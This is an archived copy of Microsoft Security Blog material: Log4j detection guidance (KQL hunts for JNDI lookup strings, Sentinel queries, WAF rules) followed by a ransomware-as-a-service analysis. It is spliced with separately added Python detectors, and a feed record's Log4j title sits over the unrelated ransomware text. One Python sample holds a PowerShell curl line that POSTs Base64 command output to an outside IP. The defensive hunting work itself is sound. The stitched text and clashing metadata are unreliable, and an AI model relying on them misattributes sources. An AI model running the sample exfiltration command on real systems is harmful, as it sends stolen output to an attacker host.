    | where ProcessCommandLine matches regex @'(?i)\$\{jndi:(ldap|http|https|ldaps|dns|rmi|iiop):\/\/(\$\{([a-z]){1,20}:([a-z]){1,20}\})?(([a-zA-Z0-9]|-){2,100})?(\.([a-zA-Z0-9]|-){2,100})?\.([a-zA-Z0-9]|-){2,100}\.([a-z0-9]){2,20}(\/).*}'
        or InitiatingProcessCommandLine matches regex @'(?i)\$\{jndi:(ldap|http|https|ldaps|dns|rmi|iiop):\/\/(\$\{([a-z]){1,20}:([a-z]){1,20}\})?(([a-zA-Z0-9]|-){2,100})?(\.([a-zA-Z0-9]|-){2,100})?\.([a-zA-Z0-9]|-){2,100}\.([a-z0-9]){2,20}(\/).*}'

**Suspicious process event creation from VMware Horizon TomcatService**

This query identifies anomalous child processes of the *ws_TomcatService.exe* process associated with the exploitation of the Log4j vulnerability in VMware Horizon installations. These events warrant further investigation to determine if they are in fact related to a vulnerable Log4j application.

    DeviceProcessEvents
    | where InitiatingProcessFileName has "ws_TomcatService.exe"
    | where FileName != "repadmin.exe"

**Suspicious JScript staging comment**

This query identifies a unique string present in malicious PowerShell commands attributed to threat actors exploiting vulnerable Log4j applications.
These events warrant further investigation to determine if they are in fact related to a vulnerable Log4j application.

    DeviceProcessEvents
    | where FileName has "powershell.exe"
    | where ProcessCommandLine has "VMBlastSG"

**Suspicious PowerShell curl flags**

This query identifies unique, uncommon flags passed to PowerShell's curl alias (Invoke-WebRequest) to post the results of an attacker-executed command back to the command-and-control infrastructure. If the event is a true positive, the contents of the “Body” argument are Base64-encoded results from an attacker-issued command. These events warrant further investigation to determine if they are in fact related to a vulnerable Log4j application.

    DeviceProcessEvents
    | where FileName has "powershell.exe"
    | where ProcessCommandLine has_all("-met", "POST", "-Body")

### Microsoft Defender for Cloud

Microsoft Defender for Cloud’s threat detection capabilities have been expanded to surface exploitation of CVE-2021-44228 in several relevant security alerts:

On Windows:

 * Detected obfuscated command line
 * Suspicious use of PowerShell detected

On Linux:

 * Suspicious file download
 * Possible Cryptocoinminer download detected
 * Process associated with digital currency mining detected
 * Potential crypto coin miner started
 * A history file has been cleared
 * Suspicious Shell Script Detected
 * Suspicious domain name reference
 * Digital currency mining related behavior detected
 * Behavior similar to common Linux bots detected

### Microsoft Defender for IoT

Microsoft Defender for IoT has released a dedicated threat intelligence update package for detecting Log4j 2 exploit attempts on the network (example below).

_Figure 19. Microsoft Defender for IoT alert_

The package is available for download from the [Microsoft Defender for IoT portal](<https://ms.portal.azure.com/#blade/Microsoft_Azure_IoT_Defender/IoTDefenderDashboard/Getting_Started>) (click _Updates_, then _Download file_; MD5: 4fbc673742b9ca51a9721c682f404c41).

_Figure 20. Microsoft Defender for IoT sensor threat intelligence update_

Microsoft Defender for IoT now pushes new threat intelligence packages to cloud-connected sensors upon release; [click here](<https://docs.microsoft.com/en-us/azure/defender-for-iot/organizations/release-notes>) for more information. Starting with sensor version 10.3, users can automatically receive up-to-date threat intelligence packages through Microsoft Defender for IoT.

Working with automatic updates reduces operational effort and ensures greater security. Enable automatic updating on the [Defender for IoT portal](<https://ms.portal.azure.com/#blade/Microsoft_Azure_IoT_Defender/IoTDefenderDashboard/Sites>) by onboarding your cloud-connected sensor with the toggle for Automatic Threat Intelligence Updates turned on. For more information about threat intelligence packages in Defender for IoT, please refer to the [documentation](<https://docs.microsoft.com/en-us/azure/defender-for-iot/organizations/how-to-work-with-threat-intelligence-packages>).

### Microsoft Sentinel

A new Microsoft Sentinel solution has been added to the Content Hub that provides a central place to install Microsoft Sentinel specific content to monitor, detect, and investigate signals related to exploitation of the CVE-2021-44228 vulnerability.

_Figure 21. Log4j Vulnerability Detection solution in Microsoft Sentinel_

To deploy this solution, in the Microsoft Sentinel portal, select **Content hub (Preview)** under **Content Management**, then search for **Log4j** in the search bar. Select the **Log4j vulnerability detection** solution, and click **Install**.
Learn how to [centrally discover and deploy Microsoft Sentinel out-of-the-box content and solutions](<https://docs.microsoft.com/azure/sentinel/sentinel-solutions-deploy>).

_Figure 22. Microsoft Sentinel Analytics showing detected Log4j vulnerability_

Note: We recommend that you check the solution for updates periodically, as new collateral may be added to this solution given the rapidly evolving situation. This can be verified on the main Content hub page.

#### Microsoft Sentinel queries

Microsoft Sentinel customers can use the following detection queries to look for this activity:

 * [Possible exploitation of Apache Log4j component detected](<https://github.com/Azure/Azure-Sentinel/blob/master/Hunting%20Queries/Syslog/Apache_log4j_Vulnerability.yaml>)

This hunting query looks for possible attempts to exploit a remote code execution vulnerability in the Log4j component of Apache. Attackers may attempt to launch arbitrary code by passing specific commands to a server, which are then logged and executed by the Log4j component.

 * [Cryptocurrency miners EXECVE](<https://github.com/Azure/Azure-Sentinel/blob/master/Hunting%20Queries/Syslog/CryptoCurrencyMiners.yaml>)

This query hunts through EXECVE syslog data generated by AUOMS to find instances of cryptocurrency miners being downloaded. It returns a table of suspicious command lines.

 * [Azure WAF Log4j CVE-2021-44228 hunting](<https://github.com/Azure/Azure-Sentinel/blob/master/Hunting%20Queries/AzureDiagnostics/WAF_log4j_vulnerability.yaml>)

This hunting query looks in Azure Web Application Firewall data to find possible exploitation attempts for CVE-2021-44228 involving the Log4j vulnerability.

 * [Log4j vulnerability exploit aka Log4Shell IP IOC](<https://github.com/Azure/Azure-Sentinel/blob/master/Detections/MultipleDataSources/Log4J_IPIOC_Dec112021.yaml>)

This hunting query identifies a match across various data feeds for IP IOCs related to the Log4j exploit described in CVE-2021-44228.

 * [Suspicious shell script detected](<https://github.com/Azure/Azure-Sentinel/blob/master/Hunting%20Queries/Syslog/Suspicious_ShellScript_Activity.yaml>)

This hunting query helps detect post-compromise suspicious shell scripts that attackers use for downloading and executing malicious files. This technique is often used by attackers and was recently used to exploit the vulnerability in the Log4j component of Apache to evade detection and stay persistent, or for further exploitation in the network.

 * [Azure WAF matching for CVE-2021-44228 Log4j vulnerability](<https://github.com/Azure/Azure-Sentinel/blob/master/Detections/AzureDiagnostics/AzureWAFmatching_log4j_vuln.yaml>)

This query alerts on a positive pattern match by Azure WAF for a CVE-2021-44228 Log4j exploitation attempt. If possible, it then decodes the malicious command for further analysis.

 * [Suspicious Base64 download activity detected](<https://github.com/Azure/Azure-Sentinel/blob/master/Hunting%20Queries/Syslog/Base64_Download_Activity.yaml>)

This hunting query helps detect suspicious Base64-obfuscated scripts that attackers use to encode payloads for downloading and executing malicious files. This technique is often used by attackers and was recently used together with the Log4j vulnerability in order to evade detection and stay persistent in the network.

 * [Linux security-related process termination activity detected](<https://github.com/Azure/Azure-Sentinel/blob/master/Hunting%20Queries/Syslog/Process_Termination_Activity.yaml>)

This query alerts on attempts to terminate processes related to security monitoring. Attackers often try to terminate such processes post-compromise, as seen recently in attacks exploiting the CVE-2021-44228 vulnerability.

 * [Suspicious manipulation of firewall detected via Syslog data](<https://github.com/Azure/Azure-Sentinel/blob/master/Hunting%20Queries/Syslog/Firewall_Disable_Activity.yaml>)

This query uses syslog data to alert on any suspicious manipulation of the firewall to evade defenses. Attackers often perform such operations, as seen recently in attacks exploiting the CVE-2021-44228 vulnerability, for C2 communications or exfiltration.

 * [User agent search for Log4j exploitation attempt](<https://github.com/Azure/Azure-Sentinel/blob/master/Detections/MultipleDataSources/UserAgentSearch_log4j.yaml>)

This query uses various log sources that carry user agent data to look for CVE-2021-44228 exploitation attempts based on the user agent pattern.

 * [Network connections to LDAP port for CVE-2021-44228 vulnerability](<https://github.com/Azure/Azure-Sentinel/blob/master/Hunting%20Queries/MultipleDataSources/NetworkConnectionldap_log4j.yaml>)

This hunting query looks for connections to the LDAP port to find possible exploitation attempts for CVE-2021-44228.

 * [Linux toolkit detected](<https://github.com/Azure/Azure-Sentinel/blob/master/Hunting%20Queries/Syslog/Linux_Toolkit_Detected.yaml>)

This query uses syslog data to alert on any attack toolkits associated with massive scanning or exploitation attempts against a known vulnerability.

 * [Container miner activity](<https://github.com/Azure/Azure-Sentinel/blob/master/Hunting%20Queries/Syslog/Container_Miner_Activity.yaml>)

This query uses syslog data to alert on possible artifacts associated with containers running images related to digital cryptocurrency mining.

 * [Network connection to new external LDAP server](<https://github.com/Azure/Azure-Sentinel/blob/master/Hunting%20Queries/CommonSecurityLog/NetworkConnectionToNewExternalLDAPServer.yaml>)

This query looks for outbound network connections using the LDAP protocol to external IP addresses, where that IP address has not had an LDAP network connection to it in the 14 days preceding the query timeframe. This could indicate someone exploiting a vulnerability such as CVE-2021-44228 to trigger the connection to a malicious LDAP server.

### Azure Firewall Premium

Customers using Azure Firewall Premium have enhanced protection from the Log4j RCE CVE-2021-44228 vulnerability and exploit. Azure Firewall Premium IDPS (Intrusion Detection and Prevention System) provides IDPS inspection for all east-west traffic and outbound traffic to the internet. The vulnerability rulesets are continuously updated and have included the CVE-2021-44228 vulnerability for different scenarios, including the UDP, TCP, and HTTP/S protocols, since December 10th, 2021. The screenshot below shows all the scenarios which are actively mitigated by Azure Firewall Premium.

**Recommendation:** Customers are recommended to configure [Azure Firewall Premium](<https://docs.microsoft.com/en-us/azure/firewall/premium-migrate>) with both IDPS Alert & Deny mode and TLS inspection enabled for proactive protection against the **CVE-2021-44228** exploit.

_Figure 23. Azure Firewall Premium portal_

Customers using Azure Firewall Standard can migrate to Premium by following [these directions](<https://docs.microsoft.com/en-us/azure/firewall/premium-migrate>).
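As an added example (not code from the Microsoft post or from the Azure-Sentinel repository), the following Python reproduces the logic of two of the hunts described above over constructed telemetry: the Defender for Endpoint query for suspicious PowerShell curl flags, extended to decode the Base64 `-Body` argument so an analyst can read what was posted, and the Sentinel hunt for outbound LDAP connections to an external address that had no LDAP connection in the preceding 14 days. The record layout, the LDAP port list (389 and 636) and the definition of “external” (outside RFC 1918, loopback and link-local ranges) are assumptions of this example, not values taken from the published queries.

```python
"""Offline re-implementation of two Log4j-era hunts over constructed telemetry.
Added example; not Microsoft's code. Record layout, ports and the 'external'
definition are assumptions of this example."""
import base64
import binascii
import ipaddress
import re
from datetime import datetime, timedelta

# --- Hunt 1: suspicious PowerShell curl flags (-met POST -Body <Base64>) -------

# Constructed sample: the Body is the Base64 of a typical command result.
SAMPLE_BODY = base64.b64encode(b"uid=0(root) gid=0(root)").decode()

PROCESS_EVENTS = [  # constructed, loosely modelled on DeviceProcessEvents columns
    {"DeviceName": "web01", "FileName": "powershell.exe",
     "ProcessCommandLine": f'powershell.exe -c "curl http://203.0.113.10/x -met POST -Body {SAMPLE_BODY}"'},
    {"DeviceName": "web01", "FileName": "powershell.exe",
     "ProcessCommandLine": r"powershell.exe -ExecutionPolicy Bypass -File C:\scripts\backup.ps1"},
    {"DeviceName": "dev03", "FileName": "cmd.exe",
     "ProcessCommandLine": "cmd.exe /c curl -X POST -d x=1 http://intranet/"},
]

_BODY_RE = re.compile(r"-Body\s+([A-Za-z0-9+/=]+)", re.IGNORECASE)


def decode_body(cmdline):
    """Return the decoded -Body argument when it is valid Base64, else None."""
    m = _BODY_RE.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-8", "replace")
    except (binascii.Error, ValueError):
        return None


def hunt_powershell_curl_post(events):
    """Same predicate as the KQL (FileName has powershell.exe, command line
    has_all -met/POST/-Body). KQL `has` matches whole terms; this approximates
    it with case-insensitive substring checks, then adds the decoded Body."""
    hits = []
    for ev in events:
        cmd = ev["ProcessCommandLine"]
        if "powershell.exe" not in ev["FileName"].lower():
            continue
        if not all(tok in cmd.lower() for tok in ("-met", "post", "-body")):
            continue
        hits.append({"DeviceName": ev["DeviceName"], "ProcessCommandLine": cmd,
                     "DecodedBody": decode_body(cmd)})
    return hits


# --- Hunt 2: outbound LDAP to an external server not seen in the prior 14 days --

LDAP_PORTS = {389, 636}  # assumption: plain LDAP and LDAPS
INTERNAL_NETS = [ipaddress.ip_network(n) for n in
                 ("10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16",
                  "127.0.0.0/8", "169.254.0.0/16")]

# Constructed connection records: (timestamp, source host, dest IP, dest port)
CONNECTIONS = [
    ("2021-11-28T10:00:00", "web01", "198.51.100.7", 389),   # known partner, in baseline
    ("2021-12-11T09:30:00", "web01", "198.51.100.7", 389),   # same server in window -> not new
    ("2021-12-11T14:02:11", "web01", "203.0.113.42", 389),   # never seen before -> alert
    ("2021-12-11T14:02:15", "web01", "10.0.0.5", 389),       # internal DC -> ignored
    ("2021-12-11T15:00:00", "app02", "203.0.113.42", 443),   # not LDAP -> ignored
]
WINDOW_START = datetime(2021, 12, 11)
WINDOW_END = datetime(2021, 12, 12)


def is_external(ip):
    """External means outside the private, loopback and link-local ranges above."""
    addr = ipaddress.ip_address(ip)
    return not any(addr in net for net in INTERNAL_NETS)


def hunt_new_external_ldap(connections, window_start, window_end, baseline_days=14):
    """Return LDAP connections inside [window_start, window_end] whose destination
    received no LDAP connection during the baseline_days before window_start."""
    baseline_start = window_start - timedelta(days=baseline_days)
    seen_in_baseline = set()
    in_window = []
    for ts, host, dst_ip, dst_port in connections:
        if dst_port not in LDAP_PORTS or not is_external(dst_ip):
            continue
        t = datetime.fromisoformat(ts)
        if baseline_start <= t < window_start:
            seen_in_baseline.add(dst_ip)
        elif window_start <= t <= window_end:
            in_window.append((ts, host, dst_ip, dst_port))
    return [c for c in in_window if c[2] not in seen_in_baseline]


if __name__ == "__main__":
    for hit in hunt_powershell_curl_post(PROCESS_EVENTS):
        print("PS curl POST:", hit["DeviceName"], "->", hit["DecodedBody"])
    for conn in hunt_new_external_ldap(CONNECTIONS, WINDOW_START, WINDOW_END):
        print("new external LDAP destination:", conn)
```

The baseline-versus-window split is the part worth keeping in mind when porting the second hunt: the 14-day baseline must be taken from the period *before* the query window, otherwise the first malicious callback also populates the baseline and suppresses itself.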
Customers new to Azure Firewall Premium can learn more about [Firewall Premium](<https://docs.microsoft.com/en-us/azure/firewall/premium-features>).

### Azure Web Application Firewall (WAF)

In response to this threat, Azure Web Application Firewall (WAF) has updated Default Rule Set (DRS) versions 1.0/1.1, available for Azure Front Door global deployments, and OWASP ModSecurity Core Rule Set (CRS) versions 3.0/3.1, available for Azure Application Gateway V2 regional deployments.

To help detect and mitigate the Log4Shell vulnerability by inspecting requests’ headers, URI, and body, we have released the following:

 * For Azure Front Door deployments, we have updated the rule **944240 “Remote Command Execution”** under Managed Rules
 * For Azure Application Gateway V2 regional deployments, we have introduced a new rule **Known-CVEs/800100** in the rule group Known-CVEs under Managed Rules

These rules are already enabled by default in block mode for all existing WAF Default Rule Set (DRS) 1.0/1.1 and OWASP ModSecurity Core Rule Set (CRS) 3.0/3.1 configurations. Customers using WAF Managed Rules would have already received enhanced protection for Log4j 2 vulnerabilities ([CVE-2021-44228](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=2021-44228>) and [CVE-2021-45046](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-45046>)); no additional action is needed.

**Recommendation**: Customers are recommended to enable a WAF policy with Default Rule Set 1.0/1.1 on their Front Door deployments, or with OWASP ModSecurity Core Rule Set (CRS) versions 3.0/3.1 on Application Gateway V2, to immediately enable protection from this threat, if not already enabled. For customers who have already enabled DRS 1.0/1.1 or CRS 3.0/3.1, no action is needed. We will continue to monitor threat patterns and modify the above rule in response to emerging attack patterns as required.

_Figure 24. Remote Code Execution rule for Default Rule Set (DRS) versions 1.0/1.1_

_Figure 25. Remote Code Execution rule for OWASP ModSecurity Core Rule Set (CRS) version 3.1_

Note: The above protection is also available on the Default Rule Set (DRS) 2.0 preview version and the OWASP ModSecurity Core Rule Set (CRS) 3.2 preview version, which are available on Azure Front Door Premium and Azure Application Gateway V2 respectively. Customers using Azure CDN Standard from Microsoft can also turn on the above protection by enabling DRS 1.0.

More information about Managed Rules and Default Rule Set (DRS) on Azure Web Application Firewall can be found [here](<https://docs.microsoft.com/azure/web-application-firewall/afds/waf-front-door-drs>). More information about Managed Rules and OWASP ModSecurity Core Rule Set (CRS) on Azure Web Application Firewall can be found [here](<https://docs.microsoft.com/azure/web-application-firewall/ag/application-gateway-crs-rulegroups-rules>).

## Indicators of compromise (IOCs)

Microsoft Threat Intelligence Center (MSTIC) has provided a list of IOCs related to this attack and will update them with new indicators as they are discovered: [https://raw.githubusercontent.com/Azure/Azure-Sentinel/master/Sample Data/Feeds/Log4j_IOC_List.csv](<https://raw.githubusercontent.com/Azure/Azure-Sentinel/master/Sample%20Data/Feeds/Log4j_IOC_List.csv>)

Microsoft will continue to monitor this dynamic situation and will update this blog as new threat intelligence and detections/mitigations become available.

#### Revision history

**[01/19/2022]** New information about an unrelated vulnerability we discovered while investigating Log4j attacks

**[01/11/2022]** New threat and vulnerability management capabilities to apply mitigation directly from the portal, as well as new advanced hunting queries

**[01/10/2022]** Added new information about a China-based ransomware operator targeting internet-facing systems and deploying the NightSky ransomware

**[01/07/2022]** Added a new rule group in Azure Web Application Firewall (WAF)

**[12/27/2021]** New capabilities in threat and vulnerability management, including a new advanced hunting schema and support for Linux, which requires updating the Microsoft Defender for Linux client; new Microsoft Defender for Containers solution

**[12/22/2021]** Added new protections across Microsoft 365 Defender, including Microsoft Defender for Office 365

**[12/21/2021]** Added a note on testing services and assumed benign activity and additional guidance to use the **Need help?** button in the Microsoft 365 Defender portal

**[12/17/2021]** New updates to observed activity, including more information about limited ransomware attacks and additional payloads; additional updates to protections from Microsoft 365 Defender and Azure Web Application Firewall (WAF), and new Microsoft Sentinel queries

**[12/16/2021]** New Microsoft Sentinel solution and additional Microsoft Defender for Endpoint detections

**[12/15/2021]** Details about ransomware attacks on non-Microsoft hosted Minecraft servers, as well as updates to product guidance, including threat and vulnerability management

**[12/14/2021]** New insights about multiple threat actors taking advantage of this vulnerability, including nation-state actors and access brokers linked to ransomware

The post [Guidance for preventing, detecting, and hunting for exploitation of the Log4j 2 vulnerability](<https://www.microsoft.com/security/blog/2021/12/11/guidance-for-preventing-detecting-and-hunting-for-cve-2021-44228-log4j-2-exploitation/>) appeared first on [Microsoft Security Blog](<https://www.microsoft.com/security/blog>).

ID MMPC:42ECD98DCF925DC4063DE66F75FB5433 Type mmpc Published 2021-12-12T05:29:03 Modified 2021-12-12T05:29:03
Title: Guidance for preventing, detecting, and hunting for exploitation of the Log4j 2 vulnerability
Source: https://www.microsoft.com/security/blog/2021/12/11/guidance-for-preventing-detecting-and-hunting-for-cve-2021-44228-log4j-2-exploitation/
CVSS v3.1: 10.0 CRITICAL (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H; exploitability 3.9, impact 6.0)
CVSS v2: 10.0 HIGH (AV:N/AC:L/Au:N/C:C/I:C/A:C; exploitability 10.0, impact 10.0)
CVE list: CVE-2021-26084, CVE-2021-34473, CVE-2021-35247, CVE-2021-44228, CVE-2021-4428, CVE-2021-44428, CVE-2021-44832, CVE-2021-45046, CVE-2021-45105

Last seen 2022-05-09T16:00:24
Description
Microsoft processes 24 trillion signals every 24 hours, and we have blocked billions of attacks in the last year alone.
Microsoft Security tracks more than 35 unique ransomware families and 250 unique threat actors across observed nation-state, ransomware, and criminal activities.

That depth of signal intelligence gathered from various domains—identity, email, data, and cloud—provides us with insight into the gig economy that attackers have created with tools designed to lower the barrier for entry for other attackers, who in turn continue to pay dividends and fund operations through the sale and associated “cut” from their tool’s success.

The cybercriminal economy is a continuously evolving connected ecosystem of many players with different techniques, goals, and skillsets. In the same way our traditional economy has shifted toward gig workers for efficiency, criminals are learning that there’s less work and less risk involved by renting or selling their tools for a portion of the profits than performing the attacks themselves. This industrialization of the cybercrime economy has made it easier for attackers to use ready-made penetration testing and other tools to perform their attacks.

Within this category of threats, Microsoft has been tracking the trend in the ransomware-as-a-service (RaaS) gig economy, called [human-operated ransomware](<https://www.microsoft.com/security/blog/2020/03/05/human-operated-ransomware-attacks-a-preventable-disaster/>), which remains one of the most impactful threats to organizations. We coined the industry term “human-operated ransomware” to clarify that these threats are driven by humans who make decisions at every stage of their attacks based on what they find in their target’s network.

Unlike the broad targeting and opportunistic approach of earlier ransomware infections, attackers behind these human-operated campaigns vary their attack patterns depending on their discoveries—for example, a security product that isn’t configured to prevent tampering or a service that’s running as a highly privileged account like a domain admin. Attackers can use those weaknesses to elevate their privileges to steal even more valuable data, leading to a bigger payout for them—with no guarantee they’ll leave their target environment once they’ve been paid. Attackers are also often more determined to stay on a network once they gain access and sometimes repeatedly monetize that access with additional attacks using different malware or ransomware payloads if they aren’t successfully evicted.

Ransomware attacks have become even more impactful in recent years as more ransomware-as-a-service ecosystems have adopted the double extortion monetization strategy. All ransomware is a form of extortion, but now, attackers are not only encrypting data on compromised devices but also exfiltrating it and then posting or threatening to post it publicly to pressure the targets into paying the ransom. Most ransomware attackers opportunistically deploy ransomware to whatever network they get access to, and some even purchase access to networks from other cybercriminals. Some attackers prioritize organizations with higher revenues, while others prefer specific industries for the shock value or type of data they can exfiltrate.

All human-operated ransomware campaigns—all human-operated attacks in general, for that matter—share common dependencies on security weaknesses that allow them to succeed. Attackers most commonly take advantage of **an organization’s poor credential hygiene and legacy configurations or misconfigurations to find easy entry and privilege escalation points in an environment.**

In this blog, we detail several of the ransomware ecosystems using the RaaS model, the importance of cross-domain visibility in finding and evicting these actors, and best practices organizations can use to protect themselves from this increasingly popular style of attack. We also offer security best practices on credential hygiene and cloud hardening, how to address security blind spots, harden internet-facing assets to understand your perimeter, and more. Here’s a quick table of contents:

 1. **How RaaS redefines our understanding of ransomware incidents**
    * The RaaS affiliate model explained
    * Access for sale and mercurial targeting
 2. **“Human-operated” means human decisions**
    * Exfiltration and double extortion
    * Persistent and sneaky access methods
 3. **Threat actors and campaigns deep dive: Threat intelligence-driven response to human-operated ransomware attacks**
 4. **Defending against ransomware: Moving beyond protection by detection**
    * Building credential hygiene
    * Auditing credential exposure
    * Prioritizing deployment of Active Directory updates
    * Cloud hardening
    * Addressing security blind spots
    * Reducing the attack surface
    * Hardening internet-facing assets and understanding your perimeter

## How RaaS redefines our understanding of ransomware incidents

With ransomware being the preferred method for many cybercriminals to monetize attacks, human-operated ransomware remains one of the most impactful threats to organizations today, and it only continues to evolve. This evolution is driven by the “human-operated” aspect of these attacks—attackers make informed and calculated decisions, resulting in varied attack patterns tailored specifically to their targets and iterated upon until the attackers are successful or evicted.

In the past, we’ve observed a tight relationship between the initial entry vector, tools, and ransomware payload choices in each campaign of one strain of ransomware. The RaaS affiliate model, which has allowed more criminals, regardless of technical expertise, to deploy ransomware built or managed by someone else, is weakening this link. As ransomware deployment becomes a gig economy, it has become more difficult to link the tradecraft used in a specific attack to the ransomware payload developers.

Reporting a ransomware incident by assigning it the payload name gives the impression that a monolithic entity is behind all attacks using the same ransomware payload and that all incidents that use the ransomware share common techniques and infrastructure. However, focusing solely on the ransomware stage obscures many stages of the attack that come before, including actions like data exfiltration and additional persistence mechanisms, as well as the numerous detection and protection opportunities for network defenders.

We know, for example, that the underlying techniques used in human-operated ransomware campaigns haven’t changed very much over the years—attacks still prey on the same security misconfigurations to succeed. Securing a large corporate network takes disciplined and sustained focus, but there’s a high ROI in implementing critical controls that prevent these attacks from having a wider impact, even if it’s only possible on the most critical assets and segments of the network.
Without the ability to steal access to highly privileged accounts, attackers can’t move laterally, spread ransomware widely, access data to exfiltrate, or use tools like Group Policy to impact security settings. Disrupting common attack patterns by applying security controls also reduces alert fatigue in security SOCs by stopping the attackers before they get in. This can also prevent unexpected consequences of short-lived breaches, such as exfiltration of network topologies and configuration data that happens in the first few minutes of execution of some trojans.

In the following sections, we explain the RaaS affiliate model and disambiguate between the attacker tools and the various threat actors at play during a security incident. Gaining this clarity helps surface trends and common attack patterns that inform defensive strategies focused on preventing attacks rather than detecting ransomware payloads. Threat intelligence and insights from this research also enrich our solutions like [Microsoft 365 Defender](<https://www.microsoft.com/security/business/threat-protection/microsoft-365-defender>), whose comprehensive security capabilities help protect customers by detecting RaaS-related attack attempts.

### The RaaS affiliate model explained

The cybercriminal economy—a connected ecosystem of many players with different techniques, goals, and skillsets—is evolving. The industrialization of attacks has progressed from attackers using off-the-shelf tools, such as Cobalt Strike, to attackers being able to purchase access to networks and the payloads they deploy to them. This means that the impact of a successful ransomware and extortion attack remains the same regardless of the attacker’s skills.

RaaS is an arrangement between an operator and an affiliate. The RaaS operator develops and maintains the tools to power the ransomware operations, including the builders that produce the ransomware payloads and payment portals for communicating with victims. The RaaS program may also include a leak site to share snippets of data exfiltrated from victims, allowing attackers to show that the exfiltration is real and try to extort payment. Many RaaS programs further incorporate a suite of extortion support offerings, including leak site hosting and integration into ransom notes, as well as decryption negotiation, payment pressure, and cryptocurrency transaction services.

RaaS thus gives a unified appearance of the payload or campaign being a single ransomware family or set of attackers. However, what happens is that the RaaS operator sells access to the ransom payload and decryptor to an affiliate, who performs the intrusion and privilege escalation and who is responsible for the deployment of the actual ransomware payload. The parties then split the profit. In addition, RaaS developers and operators might also use the payload for profit, sell it, and run their campaigns with other ransomware payloads—further muddying the waters when it comes to tracking the criminals behind these actions.

Figure 1. How the RaaS affiliate model enables ransomware attacks

### Access for sale and mercurial targeting

A component of the cybercriminal economy is selling access to systems to other attackers for various purposes, including ransomware. Access brokers can, for instance, infect systems with malware or a botnet and then sell them as a “load”. A load is designed to install other malware or backdoors onto the infected systems for other criminals. Other access brokers scan the internet for vulnerable systems, like exposed Remote Desktop Protocol (RDP) systems with weak passwords or unpatched systems, and then compromise them _en masse_ to “bank” for later profit. Some advertisements for the sale of initial access specifically cite that a system isn’t managed by an antivirus or endpoint detection and response (EDR) product and has a highly privileged credential such as Domain Administrator associated with it to fetch higher prices.

Most ransomware attackers opportunistically deploy ransomware to whatever network they get access to. Some attackers prioritize organizations with higher revenues, while some target specific industries for the shock value or type of data they can exfiltrate (for example, attackers targeting hospitals or exfiltrating data from technology companies). In many cases, the targeting doesn’t manifest itself as specifically attacking the target’s network; instead, it takes the form of purchasing access from an access broker or using an existing malware infection to pivot to ransomware activities.

In some ransomware attacks, the affiliates who bought a load or access may not even know or care how the system was compromised in the first place and are just using it as a “jump server” to perform other actions in a network. Access brokers often list the network details for the access they are selling, but affiliates aren’t usually interested in the network itself but rather the monetization potential. As a result, some attacks that seem targeted to a specific industry might simply be a case of affiliates purchasing access based on the number of systems they could deploy ransomware to and the perceived potential for profit.

## “Human-operated” means human decisions

Microsoft coined the term “human-operated ransomware” to clearly define a class of attacks driven by expert human intelligence at every step of the attack chain and culminating in intentional business disruption and extortion. Human-operated ransomware attacks share commonalities in the security misconfigurations of which they take advantage and the manual techniques used for lateral movement and persistence. However, the human-operated nature of these actions means that variations in attacks—including objectives and pre-ransom activity—evolve depending on the environment and the unique opportunities identified by the attackers.

These attacks involve many reconnaissance activities that enable human operators to profile the organization and know what next steps to take based on specific knowledge of the target. Many of the initial access campaigns that provide access to RaaS affiliates perform automated reconnaissance and exfiltration of information collected in the first few minutes of an attack.

After the attack shifts to a hands-on-keyboard phase, the reconnaissance and activities based on this knowledge can vary, depending on the tools that come with the RaaS and the operator’s skill. Frequently attackers query for the currently running security tools, privileged users, and security settings such as those defined in Group Policy before continuing their attack. The data discovered via this reconnaissance phase informs the attacker’s next steps.

If there’s minimal security hardening to complicate the attack and a highly privileged account can be gained immediately, attackers move directly to deploying ransomware by editing a Group Policy. The attackers take note of security products in the environment and attempt to tamper with and disable these, sometimes using scripts or tools provided with the RaaS purchase that try to disable multiple security products at once, other times using specific commands or techniques performed by the attacker.
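The reconnaissance pattern just described (one account querying running security tools, privileged users and Group Policy settings shortly after gaining access) is something a SOC can alert on before the tampering and Group Policy deployment steps follow. The Python below is an added example, not Microsoft’s code or a Microsoft detection rule: it classifies constructed process-creation events into the three discovery categories named in the paragraph above, groups them per host and account, slides a ten-minute window over them and raises an alert when all three categories appear inside one window. The command patterns, the window length and the threshold are assumptions for this example.

```python
"""Detect a reconnaissance burst: one account on one host enumerating security
tools, privileged users and Group Policy within a short window.
Added example, not Microsoft's code; events, patterns and thresholds are
constructed assumptions."""
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Discovery categories named in the text, each with regexes over the command
# line. These are built-in Windows admin commands; the pattern list is an
# assumption for this example, not a published detection rule.
DISCOVERY_PATTERNS = {
    "security_tools": [r"\btasklist\b", r"\bsc(\.exe)?\s+query\b", r"\bGet-MpComputerStatus\b"],
    "privileged_users": [r"\bnet(\.exe)?\s+group\b.*domain admins", r"\bwhoami\b.*/groups",
                         r"\bGet-ADGroupMember\b"],
    "group_policy": [r"\bgpresult\b", r"\bGet-GPO\b"],
}

# Constructed process-creation events (time, host, account, command line).
EVENTS = [
    {"time": "2022-03-01T02:14:05", "host": "fs01", "account": r"CORP\svc_backup", "cmd": "tasklist /svc"},
    {"time": "2022-03-01T02:14:40", "host": "fs01", "account": r"CORP\svc_backup", "cmd": "whoami /groups"},
    {"time": "2022-03-01T02:15:10", "host": "fs01", "account": r"CORP\svc_backup",
     "cmd": 'net group "Domain Admins" /domain'},
    {"time": "2022-03-01T02:16:02", "host": "fs01", "account": r"CORP\svc_backup", "cmd": "gpresult /z"},
    # A help-desk lookup in business hours: a single category, so no alert.
    {"time": "2022-03-01T10:03:00", "host": "hd07", "account": r"CORP\helpdesk1", "cmd": "whoami /groups"},
    # The same commands spread across a working day never share one window.
    {"time": "2022-03-01T08:00:00", "host": "dev02", "account": r"CORP\dev", "cmd": "tasklist"},
    {"time": "2022-03-01T13:00:00", "host": "dev02", "account": r"CORP\dev", "cmd": "gpresult /r"},
    {"time": "2022-03-01T17:30:00", "host": "dev02", "account": r"CORP\dev", "cmd": "whoami /groups"},
]


def classify(cmdline):
    """Return the set of discovery categories a command line matches."""
    return {cat for cat, pats in DISCOVERY_PATTERNS.items()
            if any(re.search(p, cmdline, re.IGNORECASE) for p in pats)}


def find_discovery_bursts(events, window=timedelta(minutes=10), min_categories=3):
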